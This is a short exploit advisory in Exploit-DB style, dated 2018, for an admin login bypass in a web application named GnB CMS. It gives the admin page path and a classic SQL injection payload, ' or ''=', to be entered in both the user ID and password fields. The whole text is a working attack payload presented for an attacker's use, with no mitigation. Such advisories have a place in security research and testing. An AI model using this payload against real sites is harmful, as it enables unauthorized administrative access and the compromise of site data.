# Exploit title: Admin Login Bypass ( GnB CMS )
#
# Dork: -
#
# Date: 3-23-2018
#
# Exploit Author: Mehdi Razmjoo ( razmjumehdi@gmail.com )
#
# Vendor Homepage: http://www.9824000430.com
#
# Category: Web Application
#
# Tested On: Safari - Firefox
#
# =============================
#
# Description:
#
# First of all attacker find admin login page like:
#
# " http://Server/Admin.aspx "
#
# after that bypass admin Username & Password through this command:
#
# User ID: ' or ''='
# Password: ' or ''='
#
# Then attacker " Login " in this page.
#